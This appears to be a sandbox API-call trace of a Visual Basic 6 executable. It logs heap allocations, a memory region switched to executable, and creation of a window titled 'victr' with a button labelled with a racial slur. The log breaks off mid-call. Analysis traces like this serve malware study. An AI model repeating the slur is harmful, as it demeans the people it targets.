[0093.402] lstrlenA (lpString="VB") returned 2 [0093.402] lstrlenA (lpString="Line") returned 4 [0093.402] RtlAllocateHeap (HeapHandle=0x2340000, Flags=0x0, Size=0x8) returned 0x2346018 [0093.402] RtlAllocateHeap (HeapHandle=0x2340000, Flags=0x8, Size=0x18) returned 0x2351f08 [0093.402] RtlAllocateHeap (HeapHandle=0x2340000, Flags=0x8, Size=0x50) returned 0x23562d0 [0093.402] RtlAllocateHeap (HeapHandle=0x2340000, Flags=0x0, Size=0xd0) returned 0x2356328 [0093.403] RtlAllocateHeap (HeapHandle=0x2340000, Flags=0x8, Size=0x15) returned 0x2351f28 [0093.403] RtlAllocateHeap (HeapHandle=0x2340000, Flags=0x8, Size=0x114) returned 0x23542d0 [0093.403] lstrlenA (lpString="VB") returned 2 [0093.403] lstrlenA (lpString="Image") returned 5 [0093.403] RtlAllocateHeap (HeapHandle=0x2340000, Flags=0x0, Size=0x9) returned 0x2352b98 [0093.403] RtlAllocateHeap (HeapHandle=0x2340000, Flags=0x8, Size=0x24) returned 0x2356400 [0093.403] RtlAllocateHeap (HeapHandle=0x2340000, Flags=0x8, Size=0x98) returned 0x2357118 [0093.403] RtlAllocateHeap (HeapHandle=0x2340000, Flags=0x8, Size=0x34) returned 0x2356430 [0093.403] RtlAllocateHeap (HeapHandle=0x2340000, Flags=0x0, Size=0x154) returned 0x23571b8 [0093.404] RtlAllocateHeap (HeapHandle=0x2340000, Flags=0x8, Size=0x15) returned 0x2351f48 [0093.404] RtlAllocateHeap (HeapHandle=0x2340000, Flags=0x8, Size=0x114) returned 0x23543f8 [0093.404] lstrlenA (lpString="VB") returned 2 [0093.404] lstrlenA (lpString="Data") returned 4 [0093.404] RtlAllocateHeap (HeapHandle=0x2340000, Flags=0x0, Size=0x8) returned 0x2346028 [0093.404] RtlAllocateHeap (HeapHandle=0x2340000, Flags=0x8, Size=0xd8) returned 0x2357318 [0093.404] RtlAllocateHeap (HeapHandle=0x2340000, Flags=0x8, Size=0x3c) returned 0x23573f8 [0093.404] RtlAllocateHeap (HeapHandle=0x2340000, Flags=0x0, Size=0x1d8) returned 0x2357440 [0093.404] RtlAllocateHeap (HeapHandle=0x2340000, Flags=0x8, Size=0x15) returned 0x2351f68 [0093.405] RtlAllocateHeap (HeapHandle=0x2340000, Flags=0x8, Size=0x114) returned 0x2354520 [0093.405] lstrlenA (lpString="VB") returned 2 [0093.405] lstrlenA (lpString="OLE") returned 3 [0093.405] RtlAllocateHeap (HeapHandle=0x2340000, Flags=0x0, Size=0x7) returned 0x2357620 [0093.405] RtlAllocateHeap (HeapHandle=0x2340000, Flags=0x8, Size=0x17c) returned 0x2357630 [0093.405] RtlAllocateHeap (HeapHandle=0x2340000, Flags=0x8, Size=0x40) returned 0x23577b8 [0093.405] RtlAllocateHeap (HeapHandle=0x2340000, Flags=0x0, Size=0x2f0) returned 0x2357800 [0093.405] RtlAllocateHeap (HeapHandle=0x2340000, Flags=0x8, Size=0x15) returned 0x2351f88 [0093.426] IMalloc:Alloc (This=0x764066bc, cb=0x64) returned 0x259c60 [0093.426] IMalloc:Alloc (This=0x764066bc, cb=0xc) returned 0x25cb10 [0093.426] IMalloc:Alloc (This=0x764066bc, cb=0x2c) returned 0x25d480 [0093.426] IMalloc:GetSize (This=0x764066bc, pv=0x25d480) returned 0x2c [0093.426] IMalloc:Alloc (This=0x764066bc, cb=0x20) returned 0x259618 [0093.427] GetCurrentThreadId () returned 0xb44 [0093.427] RtlAllocateHeap (HeapHandle=0x2340000, Flags=0x8, Size=0x54) returned 0x2357af8 [0093.427] GetCurrentThreadId () returned 0xb44 [0093.427] IMalloc:Alloc (This=0x764066bc, cb=0x1c) returned 0x259640 [0093.427] RtlAllocateHeap (HeapHandle=0x2340000, Flags=0x8, Size=0x104) returned 0x2357b58 [0093.427] RtlAllocateHeap (HeapHandle=0x2340000, Flags=0x8, Size=0x6f8) returned 0x2357c68 [0093.428] VirtualProtect (in: lpAddress=0x3b0000, dwSize=0x6000, flNewProtect=0x4, lpflOldProtect=0x18fdf8 | out: lpflOldProtect=0x18fdf8*=0x20) returned 1 [0093.428] GetCurrentProcess () returned 0xffffffff [0093.428] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x3b0000, dwSize=0x6000) returned 1 [0093.428] VirtualAlloc (lpAddress=0x3b0000, dwSize=0x7000, flAllocationType=0x1000, flProtect=0x4) returned 0x3b0000 [0093.428] VirtualAlloc (lpAddress=0x3b0000, dwSize=0x8000, flAllocationType=0x1000, flProtect=0x4) returned 0x3b0000 [0093.429] RtlAllocateHeap (HeapHandle=0x2340000, Flags=0x8, Size=0xd4) returned 0x2358368 [0093.429] VirtualAlloc (lpAddress=0x3b0000, dwSize=0x9000, flAllocationType=0x1000, flProtect=0x4) returned 0x3b0000 [0093.429] VirtualAlloc (lpAddress=0x3b0000, dwSize=0xa000, flAllocationType=0x1000, flProtect=0x4) returned 0x3b0000 [0093.429] VirtualProtect (in: lpAddress=0x3b0000, dwSize=0xa000, flNewProtect=0x20, lpflOldProtect=0x18fdf8 | out: lpflOldProtect=0x18fdf8*=0x4) returned 1 [0093.431] GetCurrentProcess () returned 0xffffffff [0093.431] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x3b0000, dwSize=0xa000) returned 1 [0093.432] GetCurrentThreadId () returned 0xb44 [0093.432] RtlAllocateHeap (HeapHandle=0x2340000, Flags=0x8, Size=0x23ec) returned 0x2358448 [0093.451] GetCurrentThreadId () returned 0xb44 [0093.451] SetWindowTextA (hWnd=0x50134, lpString="Absorber4") returned 1 [0093.451] NtdllDefWindowProc_A (hWnd=0x50134, Msg=0xc, wParam=0x0, lParam=0x18fd6c) returned 0x1 [0093.451] RegOpenKeyA (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\VBA\\Monitors", phkResult=0x18fd54 | out: phkResult=0x18fd54*=0x0) returned 0x2 [0093.455] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0093.456] VirtualQuery (in: lpAddress=0x18f780, lpBuffer=0x18f764, dwLength=0x1c | out: lpBuffer=0x18f764*(BaseAddress=0x18f000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0093.457] IMalloc:Alloc (This=0x764066bc, cb=0x54) returned 0x25d4b8 [0093.457] IMalloc:GetSize (This=0x764066bc, pv=0x25d4b8) returned 0x54 [0093.458] GetCurrentThreadId () returned 0xb44 [0093.458] RtlAllocateHeap (HeapHandle=0x2340000, Flags=0x8, Size=0x104) returned 0x235a840 [0093.458] GetCurrentThreadId () returned 0xb44 [0093.458] RtlAllocateHeap (HeapHandle=0x2340000, Flags=0x8, Size=0xa0) returned 0x235a950 [0093.458] GetCurrentThreadId () returned 0xb44 [0093.462] GetCurrentThreadId () returned 0xb44 [0093.462] GetCurrentThreadId () returned 0xb44 [0093.462] RtlAllocateHeap (HeapHandle=0x2340000, Flags=0x8, Size=0x140) returned 0x235a9f8 [0093.462] RtlAllocateHeap (HeapHandle=0x2340000, Flags=0x8, Size=0x10) returned 0x2352bb0 [0093.462] RtlAllocateHeap (HeapHandle=0x2340000, Flags=0x8, Size=0x434) returned 0x235ab40 [0093.463] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0xb4 [0093.465] RtlAllocateHeap (HeapHandle=0x2340000, Flags=0x8, Size=0x198) returned 0x235af80 [0093.465] GetVersionExA (in: lpVersionInformation=0x18fa7c*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x134603c, dwMinorVersion=0x18f9cc, dwBuildNumber=0x18fd00, dwPlatformId=0x18ff70, szCSDVersion="Í\x1e9w^\x84u") | out: lpVersionInformation=0x18fa7c*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0093.465] GetKeyboardLayout (idThread=0x0) returned 0x4090409 [0093.466] RtlAllocateHeap (HeapHandle=0x2340000, Flags=0x8, Size=0x15) returned 0x2351fa8 [0093.466] RtlAllocateHeap (HeapHandle=0x2340000, Flags=0x0, Size=0x14) returned 0x2351fc8 [0093.466] RtlAllocateHeap (HeapHandle=0x2340000, Flags=0x8, Size=0x80) returned 0x235b120 [0093.466] HeapFree (in: hHeap=0x2340000, dwFlags=0x0, lpMem=0x235b120 | out: hHeap=0x2340000) returned 1 [0093.466] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x72992cd8, cbMultiByte=-1, lpWideCharStr=0x18faa4, cchWideChar=14 | out: lpWideCharStr="MS Sans Serif") returned 14 [0093.467] OleCreateFontIndirect () returned 0x0 [0093.471] lstrlenA (lpString="victr") returned 5 [0093.471] RtlAllocateHeap (HeapHandle=0x2340000, Flags=0x0, Size=0x6) returned 0x235b120 [0093.474] OleLoadPictureEx () returned 0x0 [0093.857] lstrlenA (lpString="victr") returned 5 [0093.857] RtlAllocateHeap (HeapHandle=0x2340000, Flags=0x0, Size=0x6) returned 0x235b130 [0093.858] lstrlenA (lpString="ThunderRT6") returned 10 [0093.858] lstrcpyA (in: lpString1=0x18fab8, lpString2="ThunderRT6" | out: lpString1="ThunderRT6") returned="ThunderRT6" [0093.858] lstrlenA (lpString="ThunderRT6Form") returned 14 [0093.858] lstrcpynA (in: lpString1=0x18fac6, lpString2="DC", iMaxLength=116 | out: lpString1="DC") returned="DC" [0093.858] lstrlenA (lpString="ThunderRT6") returned 10 [0093.858] lstrcpyA (in: lpString1=0x18fa4c, lpString2="ThunderRT6" | out: lpString1="ThunderRT6") returned="ThunderRT6" [0093.858] GetClassInfoA (in: hInstance=0x72940000, lpClassName="ThunderRT6Form", lpWndClass=0x18fa78 | out: lpWndClass=0x18fa78) returned 0 [0093.858] LoadCursorA (hInstance=0x0, lpCursorName=0x7f00) returned 0x10003 [0093.858] RegisterClassA (lpWndClass=0x18fa78) returned 0xe3c169 [0093.858] lstrlenA (lpString="ThunderRT6") returned 10 [0093.858] lstrcpyA (in: lpString1=0x18fa4c, lpString2="ThunderRT6" | out: lpString1="ThunderRT6") returned="ThunderRT6" [0093.858] lstrlenA (lpString="ThunderRT6Form") returned 14 [0093.858] lstrcpynA (in: lpString1=0x18fa5a, lpString2="DC", iMaxLength=29 | out: lpString1="DC") returned="DC" [0093.858] RegisterClassA (lpWndClass=0x18fa78) returned 0xc16a [0093.858] AdjustWindowRectEx (in: lpRect=0x18fb78, dwStyle=0x2cb0000, bMenu=0, dwExStyle=0x0 | out: lpRect=0x18fb78) returned 1 [0093.859] CreateWindowExA (dwExStyle=0x0, lpClassName=0xc16a, lpWindowName="victr", dwStyle=0x2cb0000, X=847, Y=958, nWidth=768, nHeight=700, hWndParent=0x50134, hMenu=0x0, hInstance=0x72940000, lpParam=0x0) returned 0xb0094 [0093.859] NtdllDefWindowProc_A (hWnd=0xb0094, Msg=0x81, wParam=0x0, lParam=0x18f69c) returned 0x1 [0093.860] NtdllDefWindowProc_A (hWnd=0xb0094, Msg=0x83, wParam=0x0, lParam=0x18f688) returned 0x0 [0094.815] GetSystemMenu (hWnd=0xb0094, bRevert=0) returned 0x2024f [0094.818] SetWindowContextHelpId (param_1=0xb0094, param_2=0xffffffff) returned 1 [0094.818] NtdllDefWindowProc_A (hWnd=0xb0094, Msg=0x1, wParam=0x0, lParam=0x18f69c) returned 0x0 [0094.819] GetDC (hWnd=0xb0094) returned 0x6010a25 [0094.819] GetTextMetricsA (in: hdc=0x6010a25, lptm=0x18fa64 | out: lptm=0x18fa64) returned 1 [0094.819] SetBkMode (hdc=0x6010a25, mode=1) returned 2 [0094.822] OleTranslateColor () returned 0x0 [0094.822] SetBkColor (hdc=0x6010a25, color=0xf0f0f0) returned 0xffffff [0094.822] OleTranslateColor () returned 0x0 [0094.822] SetTextColor (hdc=0x6010a25, color=0x0) returned 0x0 [0094.822] OleTranslateColor () returned 0x0 [0094.822] CreatePen (iStyle=0, cWidth=1, color=0x0) returned 0x8300a23 [0094.822] SelectObject (hdc=0x6010a25, h=0x8300a23) returned 0x1b00017 [0094.822] SelectObject (hdc=0x6010a25, h=0x1900011) returned 0x1900010 [0094.822] ClientToScreen (in: hWnd=0xb0094, lpPoint=0x18fa44 | out: lpPoint=0x18fa44) returned 1 [0094.822] SetBrushOrgEx (in: hdc=0x6010a25, x=2, y=7, lppt=0x0 | out: lppt=0x0) returned 1 [0094.822] UnrealizeObject (h=0x1900015) returned 1 [0094.823] SelectObject (hdc=0x6010a25, h=0x1900015) returned 0x1900011 [0094.823] RtlAllocateHeap (HeapHandle=0x2340000, Flags=0x8, Size=0x14) returned 0x2351fe8 [0094.823] SelectObject (hdc=0x6010a25, h=0x2c0a0842) returned 0x18a002e [0094.823] GetTextMetricsA (in: hdc=0x6010a25, lptm=0x18f858 | out: lptm=0x18f858) returned 1 [0094.825] RtlAllocateHeap (HeapHandle=0x2340000, Flags=0x8, Size=0xdc) returned 0x235b140 [0094.825] RtlAllocateHeap (HeapHandle=0x2340000, Flags=0x8, Size=0x15) returned 0x2352008 [0094.825] lstrlenA (lpString="nigga") returned 5 [0094.826] RtlAllocateHeap (HeapHandle=0x2340000, Flags=0x0, Size=0x6) returned 0x235b228 [0094.826] lstrlenA (lpString="ThunderRT6") returned 10 [0094.826] lstrcpyA (in: lpString1=0x18fa88, lpString2="ThunderRT6" | out: lpString1="ThunderRT6") returned="ThunderRT6" [0094.826] lstrlenA (lpString="ThunderRT6") returned 10 [0094.826] lstrcpyA (in: lpString1=0x18fa1c, lpString2="ThunderRT6" | out: lpString1="ThunderRT6") returned="ThunderRT6" [0094.826] GetClassInfoA (in: hInstance=0x0, lpClassName="Button", lpWndClass=0x18fa48 | out: lpWndClass=0x18fa48) returned 1 [0094.826] GetClassInfoA (in: hInstance=0x72940000, lpClassName="ThunderRT6CommandButton", lpWndClass=0x18fa48 | out: lpWndClass=0x18fa48) returned 0 [0094.826] RegisterClassA (lpWndClass=0x18fa48) returned 0xc16e [0094.826] CreateWindowExA (dwExStyle=0x4, lpClassName=0xc16e, lpWindowName="nigga", dwStyle=0x44012000, X=190, Y=334, nWidth=81, nHeight=16, hWndParent=0xb0094, hMenu=0x1, hInstance=0x72940000, lpParam=0x0) returned 0x7001a [0094.827] CallWindowProcA (lpPrevWndFunc=0x7739abd3, hWnd=0x7001a, Msg=0x81, wParam=0x0, lParam=0x18f66c) returned 0x1 [0094.827] CallWindowProcA (lpPrevWndFunc=0x7739abd3, hWnd=0x7001a, Msg=0x83, wParam=0x0, lParam=0x18f658) returned 0x0 [0094.827] CallWindowProcA (lpPrevWndFunc=0x7739abd3, hWnd=0x7001a, Msg=0x1, wParam=0x0, lParam=0x18f66c) returned 0x0 [0094.827] CallWindowProcA (lpPrevWndFunc=0x7739abd3, hWnd=0x7001a, Msg=0x5, wParam=0x0, lParam=0x100051) returned 0x0 [0094.827] CallWindowProcA (lpPrevWndFunc=0x7739abd3, hWnd=0x7001a, Msg=0x3, wParam=0x0, lParam=0x14e00be) returned 0x0 [0094.828] RtlAllocateHeap (HeapHandle=0x2340000, Flags=0x8, Size=0x14) returned 0x2352028 [0094.828] CallWindowProcA (lpPrevWndFunc=0x7739abd3, hWnd=0x7001a, Msg=0x30, wParam=0x2c0a0842, lParam=0x0) returned 0x0 [0094.828] ShowWindow (hWnd=0x7001a, nCmdShow=5) returned 0 [0094.828] CallWindowProcA (lpPrevWndFunc=0x7739abd3, hWnd=0x7001a, Msg=0x18, wParam=0x1, lParam=0x0) returned 0x0 [0094.828] RtlAllocateHeap (HeapHandle=0x2340000, Flags=0x8, Size=0xdc) returned 0x235b238 [0094.829] RtlAllocateHeap (HeapHandle=0x2340000, Flags=0x8, Size=0x15) returned 0x2352048 [0094.830] lstrlenA (lpString="ThunderRT6") returned 10 [0094.830] lstrcpyA (in: lpString1=0x18fa88, lpString2="ThunderRT6" | out: lpString1="ThunderRT6") returned="ThunderRT6" [0094.830] lstrlenA (lpString="ThunderRT6") returned 10 [0094.830] lstrcpyA (in: lpString1=0x18fa1c, lpString2="ThunderRT6" | out: lpString1="ThunderRT6") returned="ThunderRT6" [0094.830] GetClassInfoA (in: hInstance=0x72940000, lpClassName="ThunderRT6Timer", lpWndClass=0x18fa48 | out: lpWndClass=0x18fa48) returned 0 [0094.830] LoadCursorA (hInstance=0x0, lpCursorName=0x7f00) returned 0x10003 [0094.830] RegisterClassA (lpWndClass=0x18fa48) returned 0x11c113 [0094.830] CreateWindowExA (dwExStyle=0x4, lpClassName=0xc113, lpWindowName=0x0, dwStyle=0x44010000, X=173, Y=54, nWidth=0, nHeight=0, hWndParent=0xb0094, hMenu=0x2, hInstance=0x72940000, lpParam=0x0) returned 0x15026e [0094.830] NtdllDefWindowProc_A (hWnd=0x15026e, Msg=0x81, wParam=0x0, lParam=0x18f66c) returned 0x1 [0094.830] NtdllDefWindowProc_A (hWnd=0x15026e, Msg=0x83, wParam=0x0, lParam=0x18f658) returned 0x0 [0094.831] NtdllDefWindowProc_A (hWnd=0x15026e, Msg=0x1, wParam=0x0, lParam=0x18f66c) returned 0x0 [0094.831] NtdllDefWindowProc_A (hWnd=0x15026e, Msg=0x5, wParam=0x0, lParam=0x0) returned 0x0 [0094.831] NtdllDefWindowProc_A (hWnd=0x15026e, Msg=0x3, wParam=0x0, lParam=0x3600ad) returned 0x0 [0094.831] RtlAllocateHeap (HeapHandle=0x2340000, Flags=0x8, Size=0xdc) returned 0x235b320 [0094.831] RtlAllocateHeap (HeapHandle=0x2340000, Flags=0x8, Size=0x15) returned 0x2352068 [0094.831] lstrlenA (lpString="ThunderRT6") returned 10 [0094.831] lstrcpyA (in: lpString1=0x18fa88, lpString2="ThunderRT6" | out: lpString1="ThunderRT6") returned="ThunderRT6" [0094.831] CreateWindowExA (dwExStyle=0x4, lpClassName=0xc113, lpWindowName=0x0, dwStyle=0x44010000, X=165, Y=75, nWidth=0, nHeight=0, hWndParent=0xb0094, hMenu=0x3, hInstance=0x72940000, lpParam=0x0) returned 0x20272 [0094.832] NtdllDefWindowProc_A (hWnd=0x20272, Msg=0x81, wParam=0x0, lParam=0x18f66c) returned 0x1 [0094.832] NtdllDefWindowProc_A (hWnd=0x20272, Msg=0x83, wParam=0x0, lParam=0x18f658) returned 0x0 [0094.832] NtdllDefWindowProc_A (hWnd=0x20272, Msg=0x1, wParam=0x0, lParam=0x18f66c) returned 0x0 [0094.832] NtdllDefWindowProc_A (hWnd=0x20272, Msg=0x5, wParam=0x0, lParam=0x0) returned 0x0 [0094.832] NtdllDefWindowProc_A (hWnd=0x20272, Msg=0x3, wParam=0x0, lParam=0x4b00a5) returned 0x0 [0094.832] GetClientRect (in: hWnd=0xb0094, lpRect=0x18fbf8 | out: lpRect=0x18fbf8) returned 1 [0094.832] MapWindowPoints (in: hWndFrom=0xb0094, hWndTo=0x0, lpPoints=0x18fbf8, cPoints=0x2 | out: lpPoints=0x18fbf8) returned 64422738 [0094.832] EqualRect (lprc1=0x18fbf8, lprc2=0x18fbd8) returned 1 [0094.833] SetEvent (hEvent=0xb4) returned 1 [0094.833] SendMessageA (hWnd=0xb0094, Msg=0x80, wParam=0x1, lParam=0x20253) returned 0x0 [0094.833] NtdllDefWindowProc_A (hWnd=0xb0094, Msg=0x80, wParam=0x1, lParam=0x20253) returned 0x0 [0094.863] NtdllDefWindowProc_A (hWnd=0xb0094, Msg=0x7f, wParam=0x2, lParam=0x0) returned 0x7011f [0094.867] CreateStreamOnHGlobal (in: hGlobal=0x0, fDeleteOnRelease=1, ppstm=0x18fab4 | out: ppstm=0x18fab4*=0x25fd50) returned 0x0 [0094.869] GetSystemMetrics (nIndex=49) returned 16 [0094.869] GetSystemMetrics (nIndex=50) returned 16 [0094.869] IStream:RemoteSeek (in: This=0x25fd50, dlibMove=0x0, dwOrigin=0x0, plibNewPosition=0x0 | out: plibNewPosition=0x0) returned 0x0 [0094.869] ISequentialStream:RemoteRead (in: This=0x25fd50, pv=0x18fa64, cb=0x6, pcbRead=0x0 | out: pv=0x18fa64*=0x0, pcbRead=0x0) returned 0x0 [0094.869] ISequentialStream:RemoteRead (in: This=0x25fd50, pv=0x18fa3c, cb=0x10, pcbRead=0x0 | out: pv=0x18fa3c*=0x20, pcbRead=0x0) returned 0x0 [0094.869] ISequentialStream:RemoteRead (in: This=0x25fd50, pv=0x18fa3c, cb=0x10, pcbRead=0x0 | out: pv=0x18fa3c*=0x60, pcbRead=0x0) returned 0x0 [0094.869] ISequentialStream:RemoteRead (in: This=0x25fd50, pv=0x18fa3c, cb=0x10, pcbRead=0x0 | out: pv=0x18fa3c*=0x20, pcbRead=0x0) returned 0x0 [0094.870] IStream:RemoteSeek (in: This=0x25fd50, dlibMove=0x36, dwOrigin=0x0, plibNewPosition=0x0 | out: plibNewPosition=0x0) returned 0x0 [0094.870] GlobalLock (hMem=0x248000c) returned 0x279420 [0094.870] ISequentialStream:RemoteRead (in: This=0x25fd50, pv=0x279420, cb=0x28, pcbRead=0x0 | out: pv=0x279420*=0x28, pcbRead=0x0) returned 0x0 [0094.870] ISequentialStream:RemoteRead (in: This=0x25fd50, pv=0x279448, cb=0x880, pcbRead=0x0 | out: pv=0x279448*=0x0, pcbRead=0x0) returned 0x0 [0094.870] GlobalUnlock (hMem=0x248000c) returned 0 [0094.870] GlobalLock (hMem=0x248000c) returned 0x279420 [0094.870] GlobalSize (hMem=0x248000c) returned 0x8a8 [0094.870] GetDC (hWnd=0x0) returned 0x2f0106cf [0094.870] CreateCompatibleBitmap (hdc=0x2f0106cf, cx=32, cy=32) returned 0x33050a26 [0094.870] SelectObject (hdc=0xf010849, h=0x33050a26) returned 0x185000f [0094.870] StretchDIBits (hdc=0xf010849, xDest=0, yDest=0, DestWidth=32, DestHeight=32, xSrc=0, ySrc=0, SrcWidth=32, SrcHeight=32, lpBits=0x279848, lpbmi=0x279420, iUsage=0x0, rop=0xcc0020) returned 32 [0094.870] GetObjectA (in: h=0x33050a26, c=24, pv=0x18f9d4 | out: pv=0x18f9d4) returned 24 [0094.870] GlobalLock (hMem=0x248001c) returned 0x2609a8 [0094.870] GetBitmapBits (in: hbit=0x33050a26, cb=4096, lpvBits=0x2609a8 | out: lpvBits=0x2609a8) returned 4096 [0094.870] SelectObject (hdc=0xf010849, h=0x185000f) returned 0x33050a26 [0094.870] DeleteObject (ho=0x33050a26) returned 1 [0094.870] CreateBitmap (nWidth=32, nHeight=32, nPlanes=0x1, nBitCount=0x1, lpBits=0x0) returned 0x34050a26 [0094.870] SelectObject (hdc=0xf010849, h=0x34050a26) returned 0x185000f [0094.870] StretchDIBits (hdc=0xf010849, xDest=0, yDest=0, DestWidth=32, DestHeight=32, xSrc=0, ySrc=0, SrcWidth=32, SrcHeight=32, lpBits=0x279c48, lpbmi=0x279420, iUsage=0x0, rop=0xcc0020) returned 32 [0094.871] GetObjectA (in: h=0x34050a26, c=24, pv=0x18f9bc | out: pv=0x18f9bc) returned 24 [0094.871] GlobalLock (hMem=0x2480024) returned 0x279cd8 [0094.871] GetBitmapBits (in: hbit=0x34050a26, cb=128, lpvBits=0x279cd8 | out: lpvBits=0x279cd8) returned 128 [0094.871] CreateIcon (hInstance=0x400000, nWidth=32, nHeight=32, cPlanes=0x1, cBitsPixel=0x20, lpbANDbits=0x279cd8, lpbXORbits=0x2609a8) returned 0x50245 [0094.871] GlobalUnlock (hMem=0x248001c) returned 0 [0094.871] GlobalUnlock (hMem=0x2480024) returned 0 [0094.871] SelectObject (hdc=0xf010849, h=0x185000f) returned 0x34050a26 [0094.871] DeleteObject (ho=0x34050a26) returned 1 [0094.871] ReleaseDC (hWnd=0x0, hDC=0x2f0106cf) returned 1 [0094.871] GlobalUnlock (hMem=0x248000c) returned 0 [0094.871] SendMessageA (hWnd=0xb0094, Msg=0x80, wParam=0x0, lParam=0x50245) returned 0x0 [0094.871] NtdllDefWindowProc_A (hWnd=0xb0094, Msg=0x80, wParam=0x0, lParam=0x50245) returned 0x0 [0094.872] IUnknown:Release (This=0x25fd50) returned 0x0 [0094.876] IsIconic (hWnd=0xb0094) returned 0 [0094.876] IsZoomed (hWnd=0xb0094) returned 0 [0094.876] GetClientRect (in: hWnd=0xb0094, lpRect=0x18fbec | out: lpRect=0x18fbec) returned 1 [0094.877] GetWindow (hWnd=0xb0094, uCmd=0x5) returned 0x7001a [0094.877] GetWindow (hWnd=0x7001a, uCmd=0x2) returned 0x15026e [0094.877] GetParent (hWnd=0x7001a) returned 0xb0094 [0094.877] GetWindow (hWnd=0x15026e, uCmd=0x2) returned 0x20272 [0094.877] GetParent (hWnd=0x15026e) returned 0xb0094 [0094.877] GetWindow (hWnd=0x20272, uCmd=0x2) returned 0x0 [0094.877] GetParent (hWnd=0x20272) returned 0xb0094 [0094.878] GetCurrentThreadId () returned 0xb44 [0094.878] GetWindow (hWnd=0xb0094, uCmd=0x4) returned 0x50134 [0094.878] IsIconic (hWnd=0x50134) returned 0 [0094.878] MonitorFromWindow (hwnd=0xb0094, dwFlags=0x2) returned 0x10001 [0094.878] GetMonitorInfoA (in: hMonitor=0x10001, lpmi=0x18fb40 | out: lpmi=0x18fb40) returned 1 [0094.878] GetWindowRect (in: hWnd=0x50134, lpRect=0x18fb68 | out: lpRect=0x18fb68) returned 1 [0094.878] SetWindowPos (hWnd=0xb0094, hWndInsertAfter=0x0, X=336, Y=100, cx=0, cy=0, uFlags=0x15) returned 1 [0094.879] NtdllDefWindowProc_A (hWnd=0xb0094, Msg=0x46, wParam=0x0, lParam=0x18fae8) returned 0x0 [0094.879] GetParent (hWnd=0xb0094) returned 0x0 [0094.879] GetWindowRect (in: hWnd=0xb0094, lpRect=0x18f710 | out: lpRect=0x18f710) returned 1 [0094.879] NtdllDefWindowProc_A (hWnd=0xb0094, Msg=0x47, wParam=0x0, lParam=0x18fae8) returned 0x0 [0094.879] NtdllDefWindowProc_A (hWnd=0xb0094, Msg=0x3, wParam=0x0, lParam=0x7d0153) returned 0x0 [0094.879] GetWindowLongA (hWnd=0xb0094, nIndex=-16) returned 113967104 [0094.879] GetClientRect (in: hWnd=0xb0094, lpRect=0x18f780 | out: lpRect=0x18f780) returned 1 [0094.879] MapWindowPoints (in: hWndFrom=0xb0094, hWndTo=0x0, lpPoints=0x18f780, cPoints=0x2 | out: lpPoints=0x18f780) returned 8192339 [0094.880] NtdllDefWindowProc_A (hWnd=0xb0094, Msg=0x7f, wParam=0x2, lParam=0x0) returned 0x50245 [0094.881] NtdllDefWindowProc_A (hWnd=0xb0094, Msg=0x83, wParam=0x1, lParam=0x18f6cc) returned 0x0 [0094.882] ShowWindow (hWnd=0xb0094, nCmdShow=1) returned 0 [0094.882] NtdllDefWindowProc_A (hWnd=0xb0094, Msg=0x18, wParam=0x1, lParam=0x0) returned 0x0 [0094.882] NtdllDefWindowProc_A (hWnd=0xb0094, Msg=0x46, wParam=0x0, lParam=0x18fb3c) returned 0x0 [0094.882] NtdllDefWindowProc_A (hWnd=0x50134, Msg=0x46, wParam=0x0, lParam=0x18fb3c) returned 0x0 [0094.887] NtdllDefWindowProc_A (hWnd=0xb0094, Msg=0x46, wParam=0x0, lParam=0x18fb3c) returned 0x0 [0094.887] NtdllDefWindowProc_A (hWnd=0x50134, Msg=0x46, wParam=0x0, lParam=0x18fb3c) returned 0x0 [0094.888] NtdllDefWindowProc_A (hWnd=0xb0094, Msg=0x1c, wParam=0x1, lParam=0xb4c) returned 0x0 [0094.888] NtdllDefWindowProc_A (hWnd=0x50134, Msg=0x1c, wParam=0x1, lParam=0xb4c) returned 0x0 [0094.888] GetWindowLongA (hWnd=0x50018, nIndex=0) returned 36970652 [0094.888] NtdllDefWindowProc_A (hWnd=0xb0094, Msg=0x86, wParam=0x1, lParam=0x0) returned 0x1 [0094.910] IsIconic (hWnd=0xb0094) returned 0 [0094.910] GetFocus () returned 0x0 [0094.911] GetWindowLongA (hWnd=0x7001a, nIndex=-16) returned 1409359872 [0094.911] IsWindowVisible (hWnd=0x7001a) returned 1 [0094.911] IsWindowEnabled (hWnd=0x7001a) returned 1 [0094.911] GetParent (hWnd=0x7001a) returned 0xb0094 [0094.911] IsWindowEnabled (hWnd=0xb0094) returned 1 [0094.911] GetParent (hWnd=0xb0094) returned 0x0 [0094.911] GetWindowLongA (hWnd=0x15026e, nIndex=-16) returned 1140916224 [0094.911] GetWindowLongA (hWnd=0x20272, nIndex=-16) returned 1140916224 [0094.911] GetFocus () returned 0x0 [0094.911] IsWindowEnabled (hWnd=0x7001a) returned 1 [0094.911] GetWindowThreadProcessId (in: hWnd=0x7001a, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xb44 [0094.911] GetCurrentThreadId () returned 0xb44 [0094.911] SetFocus (hWnd=0x7001a) returned 0x0 [0096.758] CallWindowProcA (lpPrevWndFunc=0x7739abd3, hWnd=0x7001a, Msg=0x7, wParam=0x0, lParam=0x0) returned 0x0 [0096.758] IsWindow (hWnd=0x7001a) returned 1 [0096.758] OleTranslateColor () returned 0x0 [0096.758] OleTranslateColor () returned 0x0 [0096.758] SetTextColor (hdc=0x20109e5, color=0x0) returned 0x0 [0096.758] SetBkColor (hdc=0x20109e5, color=0xf0f0f0) returned 0xffffff [0096.758] OleTranslateColor () returned 0x0 [0096.759] CreateSolidBrush (color=0xf0f0f0) returned 0x231001bc [0096.761] IsWindowEnabled (hWnd=0xb0094) returned 1 [0096.762] GetWindowLongA (hWnd=0x7001a, nIndex=-16) returned 1409359872 [0096.762] SetWindowLongA (hWnd=0x7001a, nIndex=-16, dwNewLong=1409359873) returned 1409359872 [0096.762] CallWindowProcA 